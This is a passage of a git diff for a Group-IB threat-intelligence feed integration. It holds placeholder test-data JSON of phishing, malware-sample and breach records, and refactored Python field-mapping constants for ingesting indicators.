{ - "last_fetch": { - "bp/phishing": 1614925293641 - } - }, - [ - { - "name": "Phishing: some.ru", - "occurred": "2021-01-14T11:21:34Z", - "rawJSON": "{\"dateBlocked\": null, \"dateDetected\": \"2021-01-14T11:21:34+00:00\", \"evaluation\": {\"admiraltyCode\": \"A2\", \"credibility\": 80, \"reliability\": 90, \"severity\": \"red\", \"tlp\": \"amber\", \"ttl\": 30}, \"history\": [{\"date\": \"2021-01-13T11:20:50+00:00\", \"field\": \"Detected\", \"reason\": \"In response\", \"reporter\": \"Group-IB Intelligence\", \"value\": \"In response\"}, {\"date\": \"2021-01-14T11:20:50+00:00\", \"field\": \"Status has been changed\", \"reason\": \"-\", \"reporter\": \"Group-IB Intelligence\", \"value\": \"In response\"}], \"id\": \"fce7f92d0b64946cf890842d083953649b259952\", \"ipv4\": {\"asn\": null, \"city\": \"Some city\", \"countryCode\": \"CA\", \"countryName\": \"Canada\", \"ip\": \"11.11.11.11\", \"provider\": \"Some provider\", \"region\": \"NA\"}, \"isFavourite\": false, \"isHidden\": false, \"oldId\": \"396798526\", \"phishingDomain\": {\"domain\": \"some.ru\", \"local\": \"some.ru\", \"dateRegistered\": \"2013-11-15 13:41:30\", \"title\": \"\", \"registrar\": \"Some\"}, \"portalLink\": \"https://bt.group-ib.com/attacks/phishing?searchValue=id:fce7f92d0b64946cf890842d083953649b259952\", \"seqUpdate\": 1614925293641, \"status\": \"In response\", \"targetBrand\": \"Some brand\", \"targetCategory\": \"Finance > Banking\", \"targetCountryName\": null, \"targetDomain\": \"some.ru\", \"type\": \"Phishing\", \"url\": \"https://some.ru\", \"name\": \"Phishing: some.ru\", \"gibType\": \"bp/phishing\", \"relatedIndicatorsData\": [\"https://some.ru\", \"some.ru\", \"11.11.11.11\"], \"systemSeverity\": 3}" - } - ] - ], - "malware/targeted_malware": [ - { - "last_fetch": { - "malware/targeted_malware": 1614920439682 - } - }, - [ - { - "name": "Targeted Malware: 971cca2a0f04ced4crb8218624d88de2", - "occurred": "2021-01-21T06:49:12Z", - "rawJSON": "{\"date\": \"2021-01-21T06:49:12+00:00\", \"dateAnalyzeEnded\": \"2021-01-21T09:53:23+00:00\", \"dateAnalyzeStarted\": \"2021-01-21T09:49:12+00:00\", \"evaluation\": {\"admiraltyCode\": \"A1\", \"credibility\": 100, \"reliability\": 100, \"severity\": \"red\", \"tlp\": \"red\", \"ttl\": null}, \"fileName\": \"some.txt\", \"fileType\": \"data\", \"fileVersion\": null, \"hasReport\": true, \"id\": \"5bbd38acf0b9e4f04123af494d485f6c49221e98\", \"injectDump\": \"saasadasdd\", \"injectMd5\": \"971cca2a0f04ced4crb8218624d88de2\", \"isFavourite\": false, \"isHidden\": false, \"malware\": {\"id\": \"b69fc9d439d2fd41e98a7e3c60b9a55340012eb6\", \"name\": \"Cobalt Strike\"}, \"md5\": \"11702f92313f5f5123d129809ca4f83d\", \"oldId\": \"396793259\", \"portalLink\": \"https://bt.group-ib.com/targeted_malware/Cobalt Strike/sample/5bbd38acf0b9e4f04123af494d485f6c49221e98/show\", \"seqUpdate\": 1614920439682, \"sha1\": \"93fce6228be5557c69d8eeaab5a5a2a643e7d450\", \"sha256\": \"630c88ca1d583f05283707730da5b1f4423807cd80cab108821157ad341b5003\", \"size\": 208178, \"source\": \"Sandbox service\", \"threatActor\": {\"country\": null, \"id\": \"d7ff75c35f93dce6f5410bba9a6c206bdff66555\", \"isAPT\": false, \"name\": \"FRK48\"}, \"name\": \"Targeted Malware: 971cca2a0f04ced4crb8218624d88de2\", \"gibType\": \"malware/targeted_malware\", \"relatedIndicatorsData\": [\"11702f92313f5f5123d129809ca4f83d\"], \"systemSeverity\": 3}" - } - ] - ], - "compromised/breached": [ - { - "last_fetch": { - "compromised/breached": { - "starting_date_from": "2020-01-01", - "page": 0, - "starting_date_to": "2021-01-01", - "current_date_to": "2021-01-01" - } - } - }, - [ - { - "name": "Data Breach: some@gmail.com", - "occurred": "2021-06-12T03:02:00Z", - "rawJSON": "{\"addInfo\": {\"address\": [\"\"]}, \"email\": [\"some@gmail.com\"], \"id\": [\"277c4112d348c91f6dabe9467f0d11dd\"], \"leakName\": \"some.com\", \"password\": [\"CD91C480FDE9D7ACB8AC4B78310EA2ED\", \"1390DDDFA28AE085D23518A035707231\"], \"updateTime\": \"2021-06-12T03:02:00\", \"uploadTime\": \"2021-06-12T03:02:00\", \"name\": \"Data Breach: some@gmail.com\", \"gibType\": \"compromised/breached\", \"relatedIndicatorsData\": [], \"systemSeverity\": 0}" - } - ] - ], - "bp/domain": [ - { - "last_fetch": { - "bp/domain": 3684188313 - } - }, - [ - { - "name": "Phishing Domain: some.ru", - "occurred": "2016-07-19T20:04:01Z", - "rawJSON": "{\"id\": 14940404, \"ts_create\": \"2016-07-19 20:04:01\", \"ts_update\": \"2021-01-01 00:35:46\", \"attrs\": {\"domain\": \"some.ru\", \"date_registered\": null, \"date_expired\": null, \"tld\": \"de\", \"detection_rate\": \"0/68\", \"name_server\": [\"Server\"], \"person\": \"Person\", \"address\": \"Address\", \"phone\": \"Phone\", \"organization\": null, \"registrar\": null, \"page_title\": \"Title\", \"email\": \"some@gmail.com\", \"favicon_md5\": \"38f5f976255a663bced929bb3c252880\", \"status\": \"Status\", \"type\": \"Type\", \"server_ip\": \"11.11.11.11\", \"server_ip_asn\": \"ASN\", \"server_ip_city\": \"City\", \"server_ip_country_code\": \"Code\", \"server_ip_country_name\": \"Country\", \"server_ip_provider\": \"Provider\", \"server_ip_region\": \"Region\", \"ip_history\": [], \"keywords\": [\"keywords\"], \"history\": [], \"screenshot\": \"https://bt.group-ib.com/?module=brand_domain_screenshot&action=data&id=14940404\", \"html\": \"https://bt.group-ib.com/?module=brand_domain_html&action=download&id=14940404\", \"favicon\": \"https://bt.group-ib.com/?module=brand_domain_favicon&action=data&id=14940404\"}, \"name\": \"Phishing Domain: some.ru\", \"gibType\": \"bp/domain\", \"relatedIndicatorsData\": [\"some.ru\", \"11.11.11.11\"], \"systemSeverity\": 0}" - } - ] - ] -} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIBTIA/test_data/search_example.json b/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIBTIA/test_data/search_example.json new file mode 100644 index 000000000000..01fdb4c10265 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIBTIA/test_data/search_example.json @@ -0,0 +1,42 @@ +[ + { + "apiPath": "suspicious_ip/scanner", + "label": "Suspicious IP :: Scanners", + "link": "https://tap.group-ib.com/api/v2/suspicious_ip/scanner?q=ip:8.8.8.8", + "count": 1, + "time": 0.29085319, + "detailedLinks": null + }, + { + "apiPath": "attacks/deface", + "label": "Attack :: Deface", + "link": "https://tap.group-ib.com/api/v2/attacks/deface?q=ip:8.8.8.8", + "count": 1, + "time": 0.406312784, + "detailedLinks": null + }, + { + "apiPath": "osi/public_leak", + "label": "Compromise & leaks :: Public Leaks", + "link": "https://tap.group-ib.com/api/v2/osi/public_leak?q=ip:8.8.8.8", + "count": 21847, + "time": 0.429146568, + "detailedLinks": null + }, + { + "apiPath": "suspicious_ip/open_proxy", + "label": "Suspicious IP :: Open Proxy", + "link": "https://tap.group-ib.com/api/v2/suspicious_ip/open_proxy?q=ip:8.8.8.8", + "count": 17, + "time": 0.522133669, + "detailedLinks": null + }, + { + "apiPath": "malware/config", + "label": "Malware/Source", + "link": "https://tap.group-ib.com/api/v2/malware/config?q=ip:8.8.8.8", + "count": 20, + "time": 0.655176984, + "detailedLinks": null + } +] \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIB_TIA_Feed/GroupIB_TIA_Feed.py b/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIB_TIA_Feed/GroupIB_TIA_Feed.py index 57750a977f68..9b8c283e3874 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIB_TIA_Feed/GroupIB_TIA_Feed.py +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIB_TIA_Feed/GroupIB_TIA_Feed.py @@ -1,481 +1,854 @@ - -""" IMPORTS """ import demistomock as demisto from CommonServerPython import * from CommonServerUserPython import * -from collections.abc import Generator -import dateparser -import urllib3 -from requests.auth import HTTPBasicAuth - -# Disable insecure warnings -urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) -''' CONSTANTS ''' -DATE_FORMAT = '%Y-%m-%dT%H:%M:%SZ' -# todo: add all necessary field types -COMMON_FIELD_TYPES = ['trafficlightprotocol'] -DATE_FIELDS_LIST = ["creationdate", "firstseenbysource", "lastseenbysource", "gibdatecompromised"] -IP_COMMON_FIELD_TYPES = ['asn', 'geocountry', 'geolocation'] - -EVALUATION_FIELDS = ['evaluation.reliability', 'evaluation.credibility', - 'evaluation.admiraltyCode', 'evaluation.severity'] -EVALUATION_FIELD_TYPES = ['gibreliability', 'gibcredibility', 'gibadmiraltycode', 'gibseverity'] - -MALWARE_FIELDS = ['malware.name'] -MALWARE_FIELD_TYPES = ['gibmalwarename'] +""" IMPORTS """ -THREAT_ACTOR_FIELDS = ['threatActor.name', 'threatActor.isAPT', 'threatActor.id'] -THREAT_ACTOR_FIELD_TYPES = ['gibthreatactorname', 'gibthreatactorisapt', 'gibthreatactorid'] +from urllib3.exceptions import InsecureRequestWarning +from urllib3 import disable_warnings as urllib3_disable_warnings +from cyberintegrations import TIPoller +from traceback import format_exc -MAPPING: dict = { - "compromised/mule": { - "indicators": - [ - { - "main_field": 'account', "main_field_type": 'GIB Compromised Mule', - "add_fields": [ - 'dateAdd', 'sourceType', *MALWARE_FIELDS, - *THREAT_ACTOR_FIELDS, *EVALUATION_FIELDS - ], - "add_fields_types": [ - 'creationdate', 'source', *MALWARE_FIELD_TYPES, - *THREAT_ACTOR_FIELD_TYPES, *EVALUATION_FIELD_TYPES - ] - }, - { - "main_field": 'cnc.url', "main_field_type": 'URL', - "add_fields": [ - *MALWARE_FIELDS, *THREAT_ACTOR_FIELDS, *EVALUATION_FIELDS - ], - "add_fields_types": [ - *MALWARE_FIELD_TYPES, *THREAT_ACTOR_FIELD_TYPES, *EVALUATION_FIELD_TYPES - ] - }, - { - "main_field": 'cnc.domain', "main_field_type": 'Domain', - "add_fields": [ - *MALWARE_FIELDS, *THREAT_ACTOR_FIELDS, *EVALUATION_FIELDS - ], - "add_fields_types": [ - *MALWARE_FIELD_TYPES, *THREAT_ACTOR_FIELD_TYPES, *EVALUATION_FIELD_TYPES - ] - }, - { - "main_field": 'cnc.ipv4.ip', "main_field_type": 'IP', - "add_fields": [ - 'cnc.ipv4.asn', 'cnc.ipv4.countryName', 'cnc.ipv4.region', - *MALWARE_FIELDS, *THREAT_ACTOR_FIELDS, *EVALUATION_FIELDS - ], - "add_fields_types": [ - *IP_COMMON_FIELD_TYPES, *MALWARE_FIELD_TYPES, *THREAT_ACTOR_FIELD_TYPES, *EVALUATION_FIELD_TYPES - ] - } - ] +# Disable insecure warnings +urllib3_disable_warnings(InsecureRequestWarning) + +""" CONSTANTS """ +DATE_FORMAT = "%Y-%m-%dT%H:%M:%SZ" + + +COMMON_MAPPING = { + "compromised/account_group": { + "types": { + "event_url": "URL", + "event_domain": "Domain", + "events_ipv4_ip": "IP", + "service_url": "URL", + }, + "add_fields_types": { + "event_url": { + "id": "gibid", + }, + "event_domain": { + "id": "gibid", + }, + "events_ipv4_ip": { + "id": "gibid", + "asn": "asn", + "country_name": "geocountry", + "region": "geolocation", + }, + "service_url": { + "id": "gibid", + }, + }, + "parser_mapping": { + "id": "id", + "event_url": "events.cnc.url", + "event_domain": "events.cnc.domain", + "events_ipv4_ip": "events.cnc.ipv4.ip", + "asn": "events.client.ipv4.asn", + "country_name": "events.client.ipv4.countryName", + "region": "events.client.ipv4.region", + "service_url": "service.url", + }, }, - "compromised/imei": { - "indicators": - [ - { - "main_field": 'cnc.url', "main_field_type": 'URL', - "add_fields": [ - *MALWARE_FIELDS, *THREAT_ACTOR_FIELDS, *EVALUATION_FIELDS - ], - "add_fields_types": [ - *MALWARE_FIELD_TYPES, *THREAT_ACTOR_FIELD_TYPES, *EVALUATION_FIELD_TYPES - ] - }, - { - "main_field": 'cnc.domain', "main_field_type": 'Domain', - "add_fields": [ - *MALWARE_FIELDS, *THREAT_ACTOR_FIELDS, *EVALUATION_FIELDS - ], - "add_fields_types": [ - *MALWARE_FIELD_TYPES, *THREAT_ACTOR_FIELD_TYPES, *EVALUATION_FIELD_TYPES - ] - }, - { - "main_field": 'cnc.ipv4.ip', "main_field_type": 'IP', - "add_fields": [ - 'cnc.ipv4.asn', 'cnc.ipv4.countryName', 'cnc.ipv4.region', - *MALWARE_FIELDS, *THREAT_ACTOR_FIELDS, *EVALUATION_FIELDS - ], - "add_fields_types": [ - *IP_COMMON_FIELD_TYPES, *MALWARE_FIELD_TYPES, *THREAT_ACTOR_FIELD_TYPES, *EVALUATION_FIELD_TYPES - ] - }, - { - "main_field": 'device.imei', "main_field_type": 'GIB Compromised IMEI', - "add_fields": [ - 'dateDetected', 'dateCompromised', 'device.model', - 'client.ipv4.asn', 'client.ipv4.countryName', 'client.ipv4.region', 'client.ipv4.ip', - *MALWARE_FIELDS, *THREAT_ACTOR_FIELDS, *EVALUATION_FIELDS - ], - "add_fields_types": [ - 'creationdate', 'gibdatecompromised', 'devicemodel', *IP_COMMON_FIELD_TYPES, 'ipaddress', - *MALWARE_FIELD_TYPES, *THREAT_ACTOR_FIELD_TYPES, *EVALUATION_FIELD_TYPES - ] - } - ] + "compromised/bank_card_group": { + "types": { + "cnc_url": "URL", + "cnc_domain": "Domain", + "cnc_ipv4_ip": "IP", + }, + "add_fields_types": { + "cnc_url": { + "id": "gibid", + }, + "cnc_domain": { + "id": "gibid", + }, + "cnc_ipv4_ip": { + "id": "gibid", + "cnc_ipv4_asn": "asn", + "cnc_ipv4_country_name": "geocountry", + "cnc_ipv4_region": "geolocation", + }, + }, + "parser_mapping": { + "id": "id", + "cnc_url": "events.cnc.url", + "cnc_domain": "events.cnc.domain", + "cnc_ipv4_ip": "events.cnc.ipv4.ip", + "cnc_ipv4_asn": "events.cnc.ipv4.asn", + "cnc_ipv4_country_name": "events.cnc.ipv4.countryName", + "cnc_ipv4_region": "events.cnc.ipv4.region", + }, + }, + "compromised/mule": { + "types": { + "account": "GIB Compromised Mule", + "cnc_url": "URL", + "cnc_domain": "Domain", + "cnc_ipv4_ip": "IP", + }, + "add_fields_types": { + "account": { + "id": "gibid", + "date_add": "creationdate", + "source_type": "source", + "malware_name": "gibmalwarename", + "threat_actor_name": "gibthreatactorname", + "threat_actor_is_apt": "gibthreatactorisapt", + "threat_actor_id": "gibthreatactorid", + "evaluation_reliability": "gibreliability", + "evaluation_credibility": "gibcredibility", + "evaluation_admiralty_code": "gibadmiraltycode", + "evaluation_severity": "gibseverity", + }, + "cnc_url": { + "id": "gibid", + "malware_name": "gibmalwarename", + "threat_actor_name": "gibthreatactorname", + "threat_actor_is_apt": "gibthreatactorisapt", + "threat_actor_id": "gibthreatactorid", + "evaluation_reliability": "gibreliability", + "evaluation_credibility": "gibcredibility", + "evaluation_admiralty_code": "gibadmiraltycode", + "evaluation_severity": "gibseverity", + }, + "cnc_domain": { + "id": "gibid", + "malware_name": "gibmalwarename", + "threat_actor_name": "gibthreatactorname", + "threat_actor_is_apt": "gibthreatactorisapt", + "threat_actor_id": "gibthreatactorid", + "evaluation_reliability": "gibreliability", + "evaluation_credibility": "gibcredibility", + "evaluation_admiralty_code": "gibadmiraltycode", + "evaluation_severity": "gibseverity", + }, + "cnc_ipv4_ip": { + "id": "gibid", + "cnc_ipv4_asn": "asn", + "cnc_ipv4_country_name": "geocountry", + "cnc_ipv4_region": "geolocation", + "malware_name": "gibmalwarename", + "threat_actor_name": "gibthreatactorname", + "threat_actor_is_apt": "gibthreatactorisapt", + "threat_actor_id": "gibthreatactorid", + "evaluation_reliability": "gibreliability", + "evaluation_credibility": "gibcredibility", + "evaluation_admiralty_code": "gibadmiraltycode", + "evaluation_severity": "gibseverity", + }, + }, + "parser_mapping": { + "id": "id", + "account": "account", + "date_add": "dateAdd", + "source_type": "sourceType", + "malware_name": "malware.name", + "threat_actor_name": "threatActor.name", + "threat_actor_is_apt": "threatActor.isAPT", + "threat_actor_id": "threatActor.id", + "evaluation_reliability": "evaluation.reliability", + "evaluation_credibility": "evaluation.credibility", + "evaluation_admiralty_code": "evaluation.admiraltyCode", + "evaluation_severity": "evaluation.severity", + "cnc_url": "cnc.url", + "cnc_domain": "cnc.domain", + "cnc_ipv4_ip": "cnc.ipv4.ip", + "cnc_ipv4_asn": "cnc.ipv4.asn", + "cnc_ipv4_country_name": "cnc.ipv4.countryName", + "cnc_ipv4_region": "cnc.ipv4.region", + }, }, "attacks/ddos": { - "indicators": - [ - { - "main_field": 'cnc.url', "main_field_type": 'URL', - "add_fields": [ - *MALWARE_FIELDS, *THREAT_ACTOR_FIELDS, *EVALUATION_FIELDS, - 'dateBegin', 'dateEnd', - ], - "add_fields_types": [ - *MALWARE_FIELD_TYPES, *THREAT_ACTOR_FIELD_TYPES, *EVALUATION_FIELD_TYPES, - 'firstseenbysource', 'lastseenbysource' - ] - }, - { - "main_field": 'cnc.domain', "main_field_type": 'Domain', - "add_fields": [ - *MALWARE_FIELDS, *THREAT_ACTOR_FIELDS, *EVALUATION_FIELDS, - 'dateBegin', 'dateEnd', - ], - "add_fields_types": [ - *MALWARE_FIELD_TYPES, *THREAT_ACTOR_FIELD_TYPES, *EVALUATION_FIELD_TYPES, - 'firstseenbysource', 'lastseenbysource' - ] - }, - { - "main_field": 'cnc.ipv4.ip', "main_field_type": 'IP', - "add_fields": [ - 'cnc.ipv4.asn', 'cnc.ipv4.countryName', 'cnc.ipv4.region', - *MALWARE_FIELDS, *THREAT_ACTOR_FIELDS, *EVALUATION_FIELDS, - 'dateBegin', 'dateEnd' - - ], - "add_fields_types": [ - *IP_COMMON_FIELD_TYPES, *MALWARE_FIELD_TYPES, *THREAT_ACTOR_FIELD_TYPES, - *EVALUATION_FIELD_TYPES, - 'firstseenbysource', 'lastseenbysource' - ] - }, - { - "main_field": 'target.ipv4.ip', "main_field_type": 'GIB Victim IP', - "add_fields": [ - 'target.ipv4.asn', 'target.ipv4.countryName', 'target.ipv4.region', - *MALWARE_FIELDS, *THREAT_ACTOR_FIELDS, - 'dateBegin', 'dateEnd', *EVALUATION_FIELDS - ], - "add_fields_types": [ - *IP_COMMON_FIELD_TYPES, *MALWARE_FIELD_TYPES, *THREAT_ACTOR_FIELD_TYPES, - 'firstseenbysource', 'lastseenbysource', *EVALUATION_FIELD_TYPES - ] - } - ] + "types": { + "cnc_url": "URL", + "cnc_domain": "Domain", + "cnc_ipv4_ip": "IP", + "target_ipv4_ip": "GIB Victim IP", + }, + "add_fields_types": { + "cnc_url": { + "id": "gibid", + "malware_name": "gibmalwarename", + "threat_actor_name": "gibthreatactorname", + "threat_actor_is_apt": "gibthreatactorisapt", + "threat_actor_id": "gibthreatactorid", + "evaluation_reliability": "gibreliability", + "evaluation_credibility": "gibcredibility", + "evaluation_admiralty_code": "gibadmiraltycode", + "evaluation_severity": "gibseverity", + "date_begin": "firstseenbysource", + "date_end": "lastseenbysource", + }, + "cnc_domain": { + "id": "gibid", + "malware_name": "gibmalwarename", + "threat_actor_name": "gibthreatactorname", + "threat_actor_is_apt": "gibthreatactorisapt", + "threat_actor_id": "gibthreatactorid", + "evaluation_reliability": "gibreliability", + "evaluation_credibility": "gibcredibility", + "evaluation_admiralty_code": "gibadmiraltycode", + "evaluation_severity": "gibseverity", + "date_begin": "firstseenbysource", + "date_end": "lastseenbysource", + }, + "cnc_ipv4_ip": { + "id": "gibid", + "cnc_ipv4_asn": "asn", + "cnc_ipv4_country_name": "geocountry", + "cnc_ipv4_region": "geolocation", + "malware_name": "gibmalwarename", + "threat_actor_name": "gibthreatactorname", + "threat_actor_is_apt": "gibthreatactorisapt", + "threat_actor_id": "gibthreatactorid", + "evaluation_reliability": "gibreliability", + "evaluation_credibility": "gibcredibility", + "evaluation_admiralty_code": "gibadmiraltycode", + "evaluation_severity": "gibseverity", + "date_begin": "firstseenbysource", + "date_end": "lastseenbysource", + }, + "target_ipv4_ip": { + "id": "gibid", + "target_ipv4_asn": "asn", + "target_ipv4_country_name": "geocountry", + "target_ipv4_region": "geolocation", + "malware_name": "malware.name", + "threat_actor_name": "gibthreatactorname", + "threat_actor_is_apt": "gibthreatactorisapt", + "threat_actor_id": "gibthreatactorid", + "date_begin": "firstseenbysource", + "date_end": "lastseenbysource", + "evaluation_reliability": "gibreliability", + "evaluation_credibility": "gibcredibility", + "evaluation_admiralty_code": "gibadmiraltycode", + "evaluation_severity": "gibseverity", + }, + }, + "parser_mapping": { + "id": "id", + "malware_name": "malware.name", + "threat_actor_name": "threatActor.name", + "threat_actor_is_apt": "threatActor.isAPT", + "threat_actor_id": "threatActor.id", + "evaluation_reliability": "evaluation.reliability", + "evaluation_credibility": "evaluation.credibility", + "evaluation_admiralty_code": "evaluation.admiraltyCode", + "evaluation_severity": "evaluation.severity", + "date_begin": "dateBegin", + "date_end": "dateEnd", + "cnc_url": "cnc.url", + "cnc_domain": "cnc.domain", + "cnc_ipv4_ip": "cnc.ipv4.ip", + "cnc_ipv4_asn": "cnc.ipv4.asn", + "cnc_ipv4_country_name": "cnc.ipv4.countryName", + "cnc_ipv4_region": "cnc.ipv4.region", + "target_ipv4_ip": "target.ipv4.ip", + "target_ipv4_asn": "target.ipv4.asn", + "target_ipv4_country_name": "target.ipv4.countryName", + "target_ipv4_region": "target.ipv4.region", + }, }, "attacks/deface": { - "indicators": - [ - { - "main_field": 'url', "main_field_type": 'URL', - "add_fields": [ - *THREAT_ACTOR_FIELDS, *EVALUATION_FIELDS - ], - "add_fields_types": [ - *THREAT_ACTOR_FIELD_TYPES, *EVALUATION_FIELD_TYPES - ] - }, - { - "main_field": 'targetDomain', "main_field_type": 'Domain', - "add_fields": [ - *THREAT_ACTOR_FIELDS, *EVALUATION_FIELDS - ], - "add_fields_types": [ - *THREAT_ACTOR_FIELD_TYPES, *EVALUATION_FIELD_TYPES - ] - }, - { - "main_field": 'targetIp.ip', "main_field_type": 'IP', - "add_fields": [ - 'targetIp.asn', 'targetIp.countryName', 'targetIp.region', - *THREAT_ACTOR_FIELDS, *EVALUATION_FIELDS - ], - "add_fields_types": [ - *IP_COMMON_FIELD_TYPES, *THREAT_ACTOR_FIELD_TYPES, *EVALUATION_FIELD_TYPES - ] - } - ] - }, - "attacks/phishing": { - "indicators": - [ - { - "main_field": 'url', "main_field_type": 'URL', - "add_fields": [ - 'type', *EVALUATION_FIELDS - ], - "add_fields_types": [ - 'gibphishingtype', *EVALUATION_FIELD_TYPES - ] - }, - { - "main_field": 'phishingDomain.domain', "main_field_type": 'Domain', - "add_fields": [ - 'phishingDomain.dateRegistered', 'dateDetected', 'phishingDomain.registrar', - 'phishingDomain.title', 'targetBrand', 'targetCategory', 'targetDomain', - 'type', *EVALUATION_FIELDS - ], - "add_fields_types": [ - 'creationdate', 'firstseenbysource', 'registrarname', - 'gibphishingtitle', 'gibtargetbrand', 'gibtargetcategory', 'gibtargetdomain', - 'gibphishingtype', *EVALUATION_FIELD_TYPES - ] - }, - { - "main_field": 'ipv4.ip', "main_field_type": 'IP', - "add_fields": [ - 'ipv4.asn', 'ipv4.countryName', 'ipv4.region', 'type', *EVALUATION_FIELDS - ], - "add_fields_types": [ - *IP_COMMON_FIELD_TYPES, 'gibphishingtype', *EVALUATION_FIELD_TYPES - ] - } - ] + "types": {"url": "URL", "target_domain": "Domain", "target_ip_ip": "IP"}, + "add_fields_types": { + "url": { + "id": "gibid", + "threat_actor_name": "gibthreatactorname", + "threat_actor_is_apt": "gibthreatactorisapt", + "threat_actor_id": "gibthreatactorid", + "evaluation_reliability": "gibreliability", + "evaluation_credibility": "gibcredibility", + "evaluation_admiralty_code": "gibadmiraltycode", + "evaluation_severity": "gibseverity", + }, + "target_domain": { + "id": "gibid", + "threat_actor_name": "gibthreatactorname", + "threat_actor_is_apt": "gibthreatactorisapt", + "threat_actor_id": "gibthreatactorid", + "evaluation_reliability": "gibreliability", + "evaluation_credibility": "gibcredibility", + "evaluation_admiralty_code": "gibadmiraltycode", + "evaluation_severity": "gibseverity", + }, + "target_ip_ip": { + "id": "gibid", + "target_ip_asn": "asn", + "target_ip_country_name": "geocountry", + "target_ip_region": "geolocation", + "threat_actor_name": "gibthreatactorname", + "threat_actor_is_apt": "gibthreatactorisapt", + "threat_actor_id": "gibthreatactorid", + "evaluation_reliability": "gibreliability", + "evaluation_credibility": "gibcredibility", + "evaluation_admiralty_code": "gibadmiraltycode", + "evaluation_severity": "gibseverity", + }, + }, + "parser_mapping": { + "id": "id", + "url": "url", + "target_domain": "targetDomain", + "target_ip_ip": "targetIp.ip", + "target_ip_asn": "targetIp.asn", + "target_ip_country_name": "targetIp.countryName", + "target_ip_region": "targetIp.region", + "threat_actor_name": "threatActor.name", + "threat_actor_is_apt": "threatActor.isAPT", + "threat_actor_id": "threatActor.id", + "evaluation_reliability": "evaluation.reliability", + "evaluation_credibility": "evaluation.credibility", + "evaluation_admiralty_code": "evaluation.admiraltyCode", + "evaluation_severity": "evaluation.severity", + }, }, "attacks/phishing_kit": { - "indicators": - [ - { - "main_field": 'emails', "main_field_type": 'Email', - "add_fields": [ - 'dateFirstSeen', 'dateLastSeen', *EVALUATION_FIELDS - ], - "add_fields_types": [ - 'firstseenbysource', 'lastseenbysource', *EVALUATION_FIELD_TYPES - ] - } - ] + "types": { + "emails": "Email", + }, + "add_fields_types": { + "emails": { + "id": "gibid", + "date_first_seen": "firstseenbysource", + "date_last_seen": "lastseenbysource", + "evaluation_reliability": "gibreliability", + "evaluation_credibility": "gibcredibility", + "evaluation_admiralty_code": "gibadmiraltycode", + "evaluation_severity": "gibseverity", + } + }, + "parser_mapping": { + "id": "id", + "emails": "emails", + "date_first_seen": "dateFirstSeen", + "date_last_seen": "dateLastSeen", + "evaluation_reliability": "evaluation.reliability", + "evaluation_credibility": "evaluation.credibility", + "evaluation_admiralty_code": "evaluation.admiraltyCode", + "evaluation_severity": "evaluation.severity", + }, + }, + "attacks/phishing_group": { + "types": { + "url": "URL", + "phishing_domain_domain": "Domain", + "ipv4_ip": "IP", + }, + "add_fields_types": { + "url": { + "id": "gibid", + }, + "phishing_domain_domain": { + "id": "gibid", + "phishing_domain_registrar": "registrarname", + }, + "ipv4_ip": { + "id": "gibid", + "ipv4_country_name": "geocountry", + }, + }, + "parser_mapping": { + "id": "id", + "url": "phishing.url", + "phishing_domain_registrar": "domainInfo.registrar", + "ipv4_ip": "phishing.ip.ip", + "ipv4_country_mame": "phishing.ip.countryName", + "evaluation_reliability": "evaluation.reliability", + "evaluation_credibility": "evaluation.credibility", + "evaluation_admiralty_code": "evaluation.admiraltyCode", + "evaluation_severity": "evaluation.severity", + }, }, "apt/threat": { - "indicators": - [ - { - "main_field": 'indicators.params.ipv4', "main_field_type": 'IP', - "add_fields": [ - *THREAT_ACTOR_FIELDS, 'indicators.dateFirstSeen', 'indicators.dateLastSeen', *EVALUATION_FIELDS - ], - "add_fields_types": [ - *THREAT_ACTOR_FIELD_TYPES, 'firstseenbysource', 'lastseenbysource', *EVALUATION_FIELD_TYPES - ] - }, - { - "main_field": 'indicators.params.domain', "main_field_type": 'Domain', - "add_fields": [ - *THREAT_ACTOR_FIELDS, 'indicators.dateFirstSeen', 'indicators.dateLastSeen', *EVALUATION_FIELDS - ], - "add_fields_types": [ - *THREAT_ACTOR_FIELD_TYPES, 'firstseenbysource', 'lastseenbysource', *EVALUATION_FIELD_TYPES - ] - }, - { - "main_field": 'indicators.params.url', "main_field_type": 'URL', - "add_fields": [ - *THREAT_ACTOR_FIELDS, 'indicators.dateFirstSeen', 'indicators.dateLastSeen', *EVALUATION_FIELDS - ], - "add_fields_types": [ - *THREAT_ACTOR_FIELD_TYPES, 'firstseenbysource', 'lastseenbysource', *EVALUATION_FIELD_TYPES - ] - }, - { - "main_field": 'indicators.params.hashes.md5', "main_field_type": 'File', - "add_fields": [ - 'indicators.params.name', 'indicators.params.hashes.md5', 'indicators.params.hashes.sha1', - 'indicators.params.hashes.sha256', 'indicators.params.size', - *THREAT_ACTOR_FIELDS, 'indicators.dateFirstSeen', 'indicators.dateLastSeen', *EVALUATION_FIELDS - ], - "add_fields_types": [ - 'gibfilename', 'md5', 'sha1', 'sha256', 'size', - *THREAT_ACTOR_FIELD_TYPES, 'firstseenbysource', 'lastseenbysource', *EVALUATION_FIELD_TYPES - ] - } - ] + "types": { + "indicators_params_ipv4": "IP", + "indicators_params_domain": "Domain", + "indicators_params_url": "URL", + "indicators_params_hashes_md5": "File", + }, + "add_fields_types": { + "indicators_params_ipv4": { + "id": "gibid", + "threat_actor_name": "gibthreatactorname", + "threat_actor_is_apt": "gibthreatactorisapt", + "threat_actor_id": "gibthreatactorid", + "indicators_date_first_seen": "firstseenbysource", + "indicators_date_last_seen": "lastseenbysource", + "evaluation_reliability": "gibreliability", + "evaluation_credibility": "gibcredibility", + "evaluation_admiralty_code": "gibadmiraltycode", + "evaluation_severity": "gibseverity", + "malware_list_names": "gibmalwarename", + }, + "indicators_params_domain": { + "id": "gibid", + "threat_actor_name": "gibthreatactorname", + "threat_actor_is_apt": "gibthreatactorisapt", + "threat_actor_id": "gibthreatactorid", + "indicators_date_first_seen": "firstseenbysource", + "indicators_date_last_seen": "lastseenbysource", + "evaluation_reliability": "gibreliability", + "evaluation_credibility": "gibcredibility", + "evaluation_admiralty_code": "gibadmiraltycode", + "evaluation_severity": "gibseverity", + 